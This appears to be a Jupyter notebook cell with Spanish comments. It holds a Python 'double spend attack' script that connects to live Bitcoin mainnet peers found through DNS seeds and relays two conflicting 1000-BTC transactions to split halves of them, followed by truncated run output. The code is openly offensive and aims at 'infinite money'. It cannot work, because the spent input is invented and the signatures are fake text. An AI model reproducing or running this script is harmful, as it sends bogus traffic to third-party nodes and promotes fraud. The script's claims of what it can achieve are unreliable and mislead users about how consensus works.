In [1]:
#!/usr/bin/env python3
"""
KAORU BRIDGE v28.0 - THE DOUBLE SPEND RACE
Intentando gastar el mismo UTXO (imaginario) dos veces simultáneamente.
Objetivo: Confundir el consenso y duplicar el dinero.
"""

import hashlib
import struct
import socket
import time
import random
import threading
import select
from typing import List, Dict
from datetime import datetime

class KaoruBridgeV28:

    MAINNET_MAGIC = bytes.fromhex('f9beb4d9')
    MSG_TX = 1

    # Dirección de Satoshi
    SATOSHI_SCRIPT = bytes.fromhex("76a91462e907b15cbf27d5425399ebf6f0fb50ebb88f1888ac")
    # Dirección de Kaoru (Tuya)
    KAORU_SCRIPT   = bytes.fromhex("76a914000000000000000000000000000000000000000088ac")

    def __init__(self):
        self.magic = self.MAINNET_MAGIC
        self.print_lock = threading.Lock()

        # El mismo Input para ambas transacciones (El conflicto)
        self.fake_utxo_txid = hashlib.sha256(b"KAORU_INFINITE_MONEY_GLITCH").digest()
        self.fake_utxo_vout = 0

        self.tx_satoshi = None
        self.tx_kaoru = None
        self.hash_satoshi = None
        self.hash_kaoru = None

    @staticmethod
    def double_sha256(data):
        return hashlib.sha256(hashlib.sha256(data).digest()).digest()

    @staticmethod
    def encode_varint(n):
        if n < 0xfd: return bytes([n])
        elif n <= 0xffff: return b'\xfd' + struct.pack('<H', n)
        else: return b'\xfe' + struct.pack('<I', n)

    @staticmethod
    def decode_varint(data, offset=0):
        first = data[offset]
        if first < 0xfd: return first, offset + 1
        elif first == 0xfd: return struct.unpack('<H', data[offset+1:offset+3])[0], offset + 3
        else: return struct.unpack('<I', data[offset+1:offset+5])[0], offset + 5

    def log(self, ip, msg, icon=""):
        with self.print_lock:
            t = datetime.now().strftime('%H:%M:%S')
            print(f"   [{t}] {ip:16s} | {icon} {msg}")

    def msg(self, cmd, payload):
        c = cmd.encode().ljust(12, b'\x00')
        checksum = self.double_sha256(payload)[:4]
        return self.magic + c + struct.pack('<I', len(payload)) + checksum + payload

    def version_payload(self, ip):
        p = struct.pack('<i', 70016)
        p += struct.pack('<Q', 1037)
        p += struct.pack('<q', int(time.time()))
        p += struct.pack('<Q', 1) + b'\x00'*10 + b'\xff\xff' + socket.inet_aton(ip) + struct.pack('>H', 8333)
        p += struct.pack('<Q', 1037) + b'\x00'*10 + b'\xff\xff' + b'\x00'*4 + struct.pack('>H', 8333)
        p += struct.pack('<Q', random.randint(0, 2**64-1))
        p += b'\x12/KaoruSplit:28.0/'
        p += struct.pack('<i', 870000)
        p += b'\x01'
        return p

    def create_tx(self, destination_script: bytes, memo: str) -> bytes:
        """Crea una TX gastando el UTXO conflictivo."""
        tx = struct.pack('<I', 2) # Version
        tx += b'\x01' # 1 Input
        tx += self.fake_utxo_txid
        tx += struct.pack('<I', self.fake_utxo_vout)

        # ScriptSig (Fake signature)
        sig = (memo + " - SIG").encode()
        tx += self.encode_varint(len(sig)) + sig
        tx += struct.pack('<I', 0xffffffff)

        # Output
        tx += b'\x01' # 1 Output
        tx += struct.pack('<Q', 1000 * 10**8) # 1000 BTC (Ambicioso eh?)
        tx += self.encode_varint(len(destination_script)) + destination_script

        tx += struct.pack('<I', 0) # Locktime
        return tx

    def prepare_attack(self):
        # 1. Crear TX para Satoshi
        self.tx_satoshi = self.create_tx(self.SATOSHI_SCRIPT, "FOR_SATOSHI")
        self.hash_satoshi = self.double_sha256(self.tx_satoshi)

        # 2. Crear TX para TI (Gastando LO MISMO)
        self.tx_kaoru = self.create_tx(self.KAORU_SCRIPT, "FOR_KAORU")
        self.hash_kaoru = self.double_sha256(self.tx_kaoru)

        print(f"   [SYSTEM] ⚔️ UTXO CONFLICTIVO: {self.fake_utxo_txid.hex()[:16]}...")
        print(f"   [SYSTEM] 😇 TX A (Satoshi): {self.hash_satoshi[::-1].hex()[:16]}...")
        print(f"   [SYSTEM] 😈 TX B (Kaoru)  : {self.hash_kaoru[::-1].hex()[:16]}...")

    def parse_msgs(self, data):
        msgs, i = [], 0
        while i + 24 <= len(data):
            if data[i:i+4] != self.magic:
                i += 1
                continue
            try:
                cmd = data[i+4:i+16].rstrip(b'\x00').decode()
                length = struct.unpack('<I', data[i+16:i+20])[0]
                payload = data[i+24:i+24+length]
                msgs.append((cmd, payload))
                i += 24 + length
            except: break
        return msgs

    def recv_all(self, sock):
        try:
            sock.setblocking(False)
            ready = select.select([sock], [], [], 0.1)
            if ready[0]: return sock.recv(65536)
        except: pass
        return b''

    def get_nodes(self):
        nodes = []
        for seed in ['seed.bitcoin.sipa.be', 'dnsseed.bluematt.me', 'seed.bitcoinstats.com']:
            try:
                ips = socket.gethostbyname_ex(seed)[2]
                nodes.extend(ips[:20])
            except: pass
        random.shuffle(nodes)
        return list(set(nodes))

    def attack_node(self, ip: str, tx_to_send: bytes, tx_hash: bytes, label: str):
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(5)
            self.log(ip, f"Conectando ({label})...", "🔗")
            sock.connect((ip, 8333))
            sock.send(self.msg('version', self.version_payload(ip)))

            start = time.time()
            inv_sent = False

            while time.time() - start < 45: # 45s de vida
                data = self.recv_all(sock)
                if not data:
                    time.sleep(0.1)
                    continue

                for cmd, payload in self.parse_msgs(data):
                    if cmd == 'version':
                        sock.send(self.msg('verack', b''))

                    elif cmd == 'verack':
                        if not inv_sent:
                            # Anunciamos NUESTRA versión de la realidad
                            inv = b'\x01' + struct.pack('<I', self.MSG_TX) + tx_hash
                            sock.send(self.msg('inv', inv))
                            inv_sent = True
                            self.log(ip, f"Enviado INV de TX {label}", "📢")

                    elif cmd == 'getdata':
                        # ¡Quieren la TX!
                        count, offset = self.decode_varint(payload, 0)
                        for _ in range(count):
                            if offset + 36 > len(payload): break
                            inv_type = struct.unpack('<I', payload[offset:offset+4])[0]
                            inv_hash = payload[offset+4:offset+36]
                            offset += 36

                            if inv_type == self.MSG_TX and inv_hash == tx_hash:
                                sock.send(self.msg('tx', tx_to_send))
                                self.log(ip, f"TX {label} ENVIADA. ¡Conflicto sembrado!", "💣")

                    elif cmd == 'reject':
                        try:
                            msg = payload[1:1+payload[0]].decode()
                            self.log(ip, f"REJECT {label}: {msg}", "❌")
                        except: pass

                    elif cmd == 'ping':
                        sock.send(self.msg('pong', payload[:8]))

            sock.close()
        except Exception: pass

    def execute(self):
        print(f"""
╔══════════════════════════════════════════════════════════════════════════╗
║                     ⚔️  THE QUANTUM SPLIT v28 ⚔️                         ║
║               Double Spend Attack: 1000 BTC a Satoshi vs 1000 BTC a Ti   ║
╚══════════════════════════════════════════════════════════════════════════╝
        """)

        self.prepare_attack()
        nodes = self.get_nodes()

        # Dividir nodos en Equipo A y Equipo B
        half = len(nodes) // 2
        team_satoshi = nodes[:half]
        team_kaoru = nodes[half:]

        print(f"   [SYSTEM] 🌐 Total Nodos: {len(nodes)}")
        print(f"   [SYSTEM] 😇 Equipo Satoshi: {len(team_satoshi)} nodos")
        print(f"   [SYSTEM] 😈 Equipo Kaoru:   {len(team_kaoru)} nodos")
        print("=" * 80)

        threads = []

        # Lanzar Equipo Satoshi
        for ip in team_satoshi:
            t = threading.Thread(target=self.attack_node, args=(ip, self.tx_satoshi, self.hash_satoshi, "SATOSHI"))
            t.daemon = True
            t.start()
            threads.append(t)

        # Lanzar Equipo Kaoru
        for ip in team_kaoru:
            t = threading.Thread(target=self.attack_node, args=(ip, self.tx_kaoru, self.hash_kaoru, "KAORU"))
            t.daemon = True
            t.start()
            threads.append(t)

        for t in threads:
            t.join()

        print("\n" + "=" * 80)
        print("   [SYSTEM] ✅ ATAQUE DOBLE GASTO FINALIZADO")
        print("   [SYSTEM] Si funcionó, acabas de crear dos realidades paralelas.")

if __name__ == "__main__":
    bridge = KaoruBridgeV28()
    bridge.execute()


╔══════════════════════════════════════════════════════════════════════════╗
║                     ⚔️  THE QUANTUM SPLIT v28 ⚔️                         ║
║               Double Spend Attack: 1000 BTC a Satoshi vs 1000 BTC a Ti   ║
╚══════════════════════════════════════════════════════════════════════════╝
        
   [SYSTEM] ⚔️ UTXO CONFLICTIVO: 7c1c6db96b57cb43...
   [SYSTEM] 😇 TX A (Satoshi): b59d78eb0a08fa95...
   [SYSTEM] 😈 TX B (Kaoru)  : e0fc2e7f3227be94...
   [SYSTEM] 🌐 Total Nodos: 60
   [SYSTEM] 😇 Equipo Satoshi: 30 nodos
   [SYSTEM] 😈 Equipo Kaoru:   30 nodos
   [01:17:25] 68.179.169.182   | 🔗 Conectando (SATOSHI)...
   [01:17:25] 45.40.98.249     | 🔗 Conectando (SATOSHI)...
   [01:17:25] 217.180.221.162  | 🔗 Conectando (SATOSHI)...
   [01:17:25] 76.150.180.136   | 🔗 Conectando (SATOSHI)...
   [01:17:25] 85.243.124.217   | 🔗 Conectando (SATOSHI)...
   [01:17:25] 68.209.218.129   | 🔗 Conectando (SATOSHI)...
   [01:17:25] 103.246.186.3    | 🔗 Conectando (SATOSHI)...
   [01:1